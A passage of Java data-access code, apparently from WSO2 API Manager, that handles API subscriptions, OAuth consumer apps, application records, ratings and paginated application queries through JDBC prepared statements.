UserApplicationAPIUsage> userApplicationUsages = new TreeMap<String, UserApplicationAPIUsage>(); while (result.next()) { int subId = result.getInt("SUBSCRIPTION_ID"); Map<String, String> keyData = getAccessTokenData(subId); String accessToken = keyData.get("token"); String tokenStatus = keyData.get("status"); String userId = result.getString("USER_ID"); String application = result.getString("APPNAME"); int appId = result.getInt("APPLICATION_ID"); String subStatus = result.getString("SUB_STATUS"); String subsCreateState = result.getString("SUBS_CREATE_STATE"); String key = userId + "::" + application; UserApplicationAPIUsage usage = userApplicationUsages.get(key); if (usage == null) { usage = new UserApplicationAPIUsage(); usage.setUserId(userId); usage.setApplicationName(application); usage.setAppId(appId); usage.setAccessToken(accessToken); usage.setAccessTokenStatus(tokenStatus); userApplicationUsages.put(key, usage); } APIIdentifier apiId = new APIIdentifier(result.getString("API_PROVIDER"), result.getString 
("API_NAME"), result.getString("API_VERSION")); SubscribedAPI apiSubscription = new SubscribedAPI(new Subscriber(userId), apiId); apiSubscription.setSubStatus(subStatus); apiSubscription.setSubCreatedStatus(subsCreateState); apiSubscription.setUUID(result.getString("SUB_UUID")); apiSubscription.setTier(new Tier(result.getString("SUB_TIER_ID"))); Application applicationObj = new Application(result.getString("APP_UUID")); apiSubscription.setApplication(applicationObj); usage.addApiSubscriptions(apiSubscription); } return userApplicationUsages.values().toArray(new UserApplicationAPIUsage[userApplicationUsages.size()]); } catch (SQLException e) { handleException("Failed to find API Usage for :" + providerName, e); return null; } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } } /** * @param apiName Name of the API * @param apiVersion Version of the API * @param provider Name of API creator * @return All subscriptions of a given API * @throws org.wso2.carbon.apimgt.api.APIManagementException */ public List<SubscribedAPI> getSubscriptionsOfAPI(String apiName, String apiVersion, String provider) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; List<SubscribedAPI> subscriptions = new ArrayList<>(); try { String sqlQuery = SQLConstants.GET_SUBSCRIPTIONS_OF_API_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, apiName); ps.setString(2, apiVersion); ps.setString(3, provider); result = ps.executeQuery(); while (result.next()) { APIIdentifier apiId = new APIIdentifier(result.getString("API_PROVIDER"), apiName, apiVersion); Subscriber subscriber = new Subscriber(result.getString("USER_ID")); SubscribedAPI subscription = new SubscribedAPI(subscriber, apiId); subscription.setUUID(result.getString("SUB_UUID")); subscription.setSubStatus(result.getString("SUB_STATUS")); subscription.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscription.setTier(new Tier(result.getString("SUB_TIER_ID"))); subscription.setCreatedTime(result.getString("SUB_CREATED_TIME")); Application application = new Application(result.getInt("APPLICATION_ID")); application.setName(result.getString("APPNAME")); subscription.setApplication(application); subscriptions.add(subscription); } } catch (SQLException e) { handleException("Error occurred while reading subscriptions of API: " + apiName + ':' + apiVersion, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptions; } private void updateOAuthConsumerApp(String appName, String callbackUrl) throws IdentityOAuthAdminException, APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String sqlStmt = SQLConstants.UPDATE_OAUTH_CONSUMER_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(sqlStmt); prepStmt.setString(1, callbackUrl); prepStmt.setString(2, appName); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error when updating OAuth consumer App for " + appName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } private boolean isDuplicateConsumer(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rSet = null; String sqlQuery = SQLConstants.GET_ALL_OAUTH_CONSUMER_APPS_SQL; boolean isDuplicateConsumer = false; try { connection = 
APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, consumerKey); rSet = prepStmt.executeQuery(); if (rSet.next()) { isDuplicateConsumer = true; } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rSet); } return isDuplicateConsumer; } public int addApplication(Application application, String userId) throws APIManagementException { Connection conn = null; int applicationId = 0; String loginUserName = getLoginUserName(userId); try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); applicationId = addApplication(application, loginUserName, conn); if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); updateGroupIDMappings(conn, applicationId, application.getGroupId(), tenantDomain); } conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add Application ", e1); } } handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return applicationId; } public void addRating(APIIdentifier apiId, int rating, String user) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); addRating(apiId, rating, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add rating ", e1); } } handleException("Failed to add API rating", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * @param apiIdentifier API Identifier * @param userId User Id * @throws APIManagementException if failed to add the API rating */ public void addRating(APIIdentifier apiIdentifier, int rating, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; PreparedStatement psSelect = null; ResultSet rs = null; try { int tenantId; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } boolean userRatingExists = false; //This query checks whether a rating already exists for the user in the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_API_RATING_SQL; psSelect = conn.prepareStatement(sqlQuery); psSelect.setInt(1, apiId); psSelect.setInt(2, subscriber.getId()); rs = psSelect.executeQuery(); while (rs.next()) { userRatingExists = true; } String sqlAddQuery; if (!userRatingExists) { //This query to insert into the AM_API_RATINGS table sqlAddQuery = SQLConstants.APP_API_RATING_SQL; } else { //This query to update the AM_API_RATINGS table sqlAddQuery = SQLConstants.UPDATE_API_RATING_SQL; } // Add or update the rating in the AM_API_RATINGS table ps = conn.prepareStatement(sqlAddQuery); ps.setInt(1, rating); ps.setInt(2, apiId); ps.setInt(3, subscriber.getId()); ps.executeUpdate(); } catch (SQLException e) { handleException("Failed to add 
API rating of the user:" + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); APIMgtDBUtil.closeAllConnections(psSelect, null, null); } } public void removeAPIRating(APIIdentifier apiId, String user) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); removeAPIRating(apiId, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the remove rating ", e1); } } handleException("Failed to remove API rating", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * @param apiIdentifier API Identifier * @param userId User Id * @throws APIManagementException if failed to remove the API rating */ public void removeAPIRating(APIIdentifier apiIdentifier, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; PreparedStatement psSelect = null; ResultSet rs = null; try { int tenantId; int rateId = -1; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } //Get API Id int apiId = -1; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } //This query checks whether a rating already exists for the user in the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_RATING_ID_SQL; psSelect = conn.prepareStatement(sqlQuery); psSelect.setInt(1, apiId); psSelect.setInt(2, subscriber.getId()); rs = psSelect.executeQuery(); while (rs.next()) { rateId = rs.getInt("RATING_ID"); } String sqlAddQuery; if (rateId != -1) { //This query deletes the specific rating row from the AM_API_RATINGS table sqlAddQuery = SQLConstants.REMOVE_RATING_SQL; // Remove the rating from the AM_API_RATINGS table ps = conn.prepareStatement(sqlAddQuery); ps.setInt(1, rateId); ps.executeUpdate(); } } catch (SQLException e) { handleException("Failed to delete API rating", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); APIMgtDBUtil.closeAllConnections(psSelect, null, rs); } } public int getUserRating(APIIdentifier apiId, String user) throws APIManagementException { Connection conn = null; int userRating = 0; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); userRating = getUserRating(apiId, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return userRating; } /** * @param apiIdentifier API Identifier * @param userId User Id * @throws APIManagementException if failed to get the user rating */ public int getUserRating(APIIdentifier apiIdentifier, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; int userRating = 0; try { int tenantId; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new 
APIManagementException(msg); } //Get API Id int apiId = -1; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } //This query reads the user's rating from the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_RATING_SQL; // Reading the rating from the AM_API_RATINGS table ps = conn.prepareStatement(sqlQuery); ps.setInt(1, subscriber.getId()); ps.setInt(2, apiId); rs = ps.executeQuery(); while (rs.next()) { userRating = rs.getInt("RATING"); } } catch (SQLException e) { handleException("Failed to get user rating", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return userRating; } public float getAverageRating(APIIdentifier apiId) throws APIManagementException { Connection conn = null; float avrRating = 0; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); avrRating = getAverageRating(apiId, conn); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return avrRating; } public float getAverageRating(int apiId) throws APIManagementException { Connection conn = null; float avrRating = 0; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); if (apiId == -1) { String msg = "Invalid APIId : " + apiId; log.error(msg); return Float.NEGATIVE_INFINITY; } //This query reads the average rating from the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_AVERAGE_RATING_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { avrRating = rs.getFloat("RATING"); } } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return avrRating; } /** * @param apiIdentifier API Identifier * @throws APIManagementException if failed to get the average rating */ public float getAverageRating(APIIdentifier apiIdentifier, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; float avrRating = 0; try { //Get API Id int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); return Float.NEGATIVE_INFINITY; } //This query reads the average rating from the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_AVERAGE_RATING_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { avrRating = rs.getFloat("RATING"); } } catch (SQLException e) { handleException("Failed to get average rating", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } BigDecimal decimal = new BigDecimal(avrRating); return Float.parseFloat(decimal.setScale(1, BigDecimal.ROUND_UP).toString()); } /** * @param application Application * @param userId User Id * @throws APIManagementException if failed to add Application */ public int addApplication(Application application, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; conn.setAutoCommit(false); ResultSet rs = null; int applicationId = 0; try { int tenantId = 
APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } //This query to update the AM_APPLICATION table String sqlQuery = SQLConstants.APP_APPLICATION_SQL; // Adding data to the AM_APPLICATION table //ps = conn.prepareStatement(sqlQuery); ps = conn.prepareStatement(sqlQuery, new String[]{"APPLICATION_ID"}); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { ps = conn.prepareStatement(sqlQuery, new String[]{"application_id"}); } ps.setString(1, application.getName()); ps.setInt(2, subscriber.getId()); ps.setString(3, application.getTier()); ps.setString(4, application.getCallbackUrl()); ps.setString(5, application.getDescription()); if (APIConstants.DEFAULT_APPLICATION_NAME.equals(application.getName())) { ps.setString(6, APIConstants.ApplicationStatus.APPLICATION_APPROVED); } else { ps.setString(6, APIConstants.ApplicationStatus.APPLICATION_CREATED); } String groupId = application.getGroupId(); if (multiGroupAppSharingEnabled) { // setting an empty groupId since groupid's should be saved in groupId mapping table groupId = ""; } ps.setString(7, groupId); ps.setString(8, subscriber.getName()); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); ps.setTimestamp(9, timestamp); ps.setTimestamp(10, timestamp); ps.setString(11, UUID.randomUUID().toString()); ps.setString(12, String.valueOf(application.getTokenType())); ps.executeUpdate(); rs = ps.getGeneratedKeys(); while (rs.next()) { applicationId = Integer.parseInt(rs.getString(1)); } //Adding data to AM_APPLICATION_ATTRIBUTES table if( application.getApplicationAttributes() != null) { addApplicationAttributes(conn, application.getApplicationAttributes(), applicationId, tenantId); } } catch (SQLException e) { handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return applicationId; } public void updateApplication(Application application) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement preparedStatement = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to update the AM_APPLICATION table String sqlQuery = SQLConstants.UPDATE_APPLICATION_SQL; // Adding data to the AM_APPLICATION table ps = conn.prepareStatement(sqlQuery); ps.setString(1, application.getName()); ps.setString(2, application.getTier()); ps.setString(3, application.getCallbackUrl()); ps.setString(4, application.getDescription()); //TODO need to find the proper user who updates this application. 
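// per the TODO above, the updating user is not tracked yet, so the corresponding column is set to null below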
ps.setString(5, null); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); ps.setString(7, application.getTokenType()); ps.setInt(8, application.getId()); ps.executeUpdate(); if (multiGroupAppSharingEnabled) { Subscriber subscriber = application.getSubscriber(); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); updateGroupIDMappings(conn, application.getId(), application.getGroupId(), tenantDomain); } Subscriber subscriber = application.getSubscriber(); String domain = MultitenantUtils.getTenantDomain(subscriber.getName()); int tenantId = IdentityTenantUtil.getTenantId(domain); preparedStatement = conn.prepareStatement(SQLConstants.REMOVE_APPLICATION_ATTRIBUTES_SQL); preparedStatement.setInt(1,application.getId()); preparedStatement.execute(); if (log.isDebugEnabled()) { log.debug("Old attributes of application - " + application.getName() + " are removed"); } if (application.getApplicationAttributes() != null && !application.getApplicationAttributes().isEmpty()) { addApplicationAttributes(conn, application.getApplicationAttributes(), application.getId(), tenantId); } conn.commit(); updateOAuthConsumerApp(application.getName(), application.getCallbackUrl()); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } catch (IdentityOAuthAdminException e) { handleException("Failed to update OAuth Consumer Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); APIMgtDBUtil.closeAllConnections(preparedStatement,conn,null); } } /** * Update the status of the Application creation process * * @param applicationId * @param status * @throws APIManagementException */ public void updateApplicationStatus(int applicationId, String status) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String updateSqlQuery = SQLConstants.UPDATE_APPLICATION_STATUS_SQL; ps = conn.prepareStatement(updateSqlQuery); ps.setString(1, status); ps.setInt(2, applicationId); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * get the status of the Application creation process * * @param appName * @return * @throws APIManagementException */ public String getApplicationStatus(String appName, String userId) throws APIManagementException { int applicationId = getApplicationId(appName, userId); return getApplicationStatusById(applicationId); } /** * get the status of the Application creation process given the application Id * * @param applicationId Id of the Application * @return * @throws APIManagementException */ public String getApplicationStatusById(int applicationId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String status = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.GET_APPLICATION_STATUS_BY_ID_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); resultSet = ps.executeQuery(); while (resultSet.next()) { status = resultSet.getString("APPLICATION_STATUS"); } conn.commit(); } catch 
(SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return status; } /** * Check whether given application name is available under current subscriber or group * * @param appName application name * @param username subscriber * @param groupId group of the subscriber * @return true if application is available for the subscriber * @throws APIManagementException if failed to get applications for given subscriber */ public boolean isApplicationExist(String appName, String username, String groupId) throws APIManagementException { if (username == null) { return false; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_PREFIX; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdCaseInsensitive = " AND (APP.GROUP_ID = ? " + "OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ) " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR (LOWER(SUB.USER_ID) = LOWER(?))" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInsensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) 
"; try { connection = APIMgtDBUtil.getConnection(); if (!StringUtils.isEmpty(groupId)) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupId.split(","); int noOfParams = grpIdArray.length; preparedStatement = fillQueryParams(connection, sqlQuery, grpIdArray, 2); preparedStatement.setString(1, appName); int paramIndex = noOfParams + 1; preparedStatement.setString(++paramIndex, tenantDomain); preparedStatement.setString(++paramIndex, subscriber.getName()); preparedStatement.setString(++paramIndex, tenantDomain + '/' + groupId); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithGroupId; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, groupId); preparedStatement.setString(3, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInsensitive; } else { sqlQuery += whereClause; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, subscriber.getName()); } resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { appId = resultSet.getInt("APPLICATION_ID"); } if (appId > 0) { return true; } } catch (SQLException e) { handleException("Error while getting the id of " + appName + " from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return false; } /** * Check whether the new user has an application * * @param appName application name * @param username subscriber * @return true if application is available for the subscriber * @throws APIManagementException if failed to get applications for given subscriber */ public boolean isApplicationOwnedBySubscriber(String appName, String username) throws APIManagementException { if (username == null) { return false; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_PREFIX; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInsensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; try { connection = APIMgtDBUtil.getConnection(); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInsensitive; } else { sqlQuery += whereClause; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, subscriber.getName()); resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { appId = resultSet.getInt("APPLICATION_ID"); } if (appId > 0) { return true; } } catch (SQLException e) { handleException("Error while getting the id of " + appName + " from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return false; } /** * @param username Subscriber * @return ApplicationId for given appname. * @throws APIManagementException if failed to get Applications for given subscriber. 
*/ public int getApplicationId(String appName, String username) throws APIManagementException { if (username == null) { return 0; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, subscriber.getId()); prepStmt.setString(2, appName); rs = prepStmt.executeQuery(); while (rs.next()) { appId = rs.getInt("APPLICATION_ID"); } } catch (SQLException e) { handleException("Error when getting the application id from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return appId; } /** * Find the name of the application by Id * * @param applicationId - application id * @return - application name * @throws APIManagementException */ public String getApplicationNameFromId(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String appName = null; String sqlQuery = SQLConstants.GET_APPLICATION_NAME_FROM_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); rs = prepStmt.executeQuery(); while (rs.next()) { appName = rs.getString("NAME"); } } catch (SQLException e) { handleException("Error when getting the application name for id " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return appName; } public int getAllApplicationCount(Subscriber subscriber, String groupingId, String search) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String sqlQuery = null; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE_WITH_MULTIGROUPID; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE_WITH_MULTIGROUPID; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupingId.split(","); int noOfParams = grpIdArray.length; prepStmt = fillQueryParams(connection, sqlQuery, grpIdArray, 1); prepStmt.setString(++noOfParams, tenantDomain); prepStmt.setString(++noOfParams, subscriber.getName()); prepStmt.setString(++noOfParams, "%" + search + "%"); } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE_WITHGROUPID; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE_WITHGROUPID; } prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); prepStmt.setString(3, "%" + search + "%"); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE; } prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, subscriber.getName()); prepStmt.setString(2, "%" + search + "%"); } resultSet = prepStmt.executeQuery(); int applicationCount = 0; if (resultSet != null) { while (resultSet.next()) { applicationCount = resultSet.getInt("count"); } } if (applicationCount > 
0) { return applicationCount; } } catch (SQLException e) { handleException("Failed to get application count : ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return 0; } /** * Returns all applications created by given user Id * * @param userId user name of the application owner * @return applications created by the given user * @throws APIManagementException */ public Application[] getApplicationsByOwner(String userId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATIONS_BY_OWNER; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, userId); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("UUID")); application.setName(rs.getString("NAME")); application.setOwner(rs.getString("CREATED_BY")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(rs.getInt("APPLICATION_ID"))); } applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when getting applications created by user " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Updates the owner of the given application * * @param userName user name of the new application owner * @param application application whose ownership should be transferred * @return true if the application owner was updated successfully * @throws APIManagementException */ public boolean updateApplicationOwner(String userName, Application application) throws APIManagementException { boolean isAppUpdated = false; Connection connection = null; PreparedStatement prepStmt = null; String sqlQuery = SQLConstants.UPDATE_APPLICATION_OWNER; try { Subscriber subscriber = getSubscriber(userName); if (subscriber != null) { int subscriberId = subscriber.getId(); connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, userName); prepStmt.setInt(2, subscriberId); prepStmt.setString(3, application.getUUID()); prepStmt.executeUpdate(); isAppUpdated = true; } else { String errorMessage = "Error when retrieving subscriber details for user " + userName; handleException(errorMessage, new APIManagementException(errorMessage)); } } catch (SQLException e) { handleException("Error when updating application owner for user " + userName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } return isAppUpdated; } /** * #TODO later we might need to use only this method. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @param start The start index. * @param offset The offset. * @param search The search string. * @param sortOrder The sort order. * @param sortColumn The sort column. * @return Application[] The array of applications.
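 * <p>
 * Illustrative call (editorial sketch; the sort column/order values are assumptions and, as noted
 * in the method body, are expected to be sanitized by the caller):
 * <pre>{@code
 * // Applications owned by "admin", no group filter, empty search, sorted by NAME ascending.
 * Application[] page = dao.getApplicationsWithPagination(
 *         new Subscriber("admin"), null, 0, 10, "", "NAME", "ASC");
 * }</pre>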
* @throws APIManagementException */ public Application[] getApplicationsWithPagination(Subscriber subscriber, String groupingId, int start, int offset, String search, String sortColumn, String sortOrder) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = null; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE_WITH_MULTIGROUPID"); } else { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE_WITH_MULTIGROUPID"); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE_WITHGROUPID"); } else { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE_WITHGROUPID"); } } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE"); } else { sqlQuery = 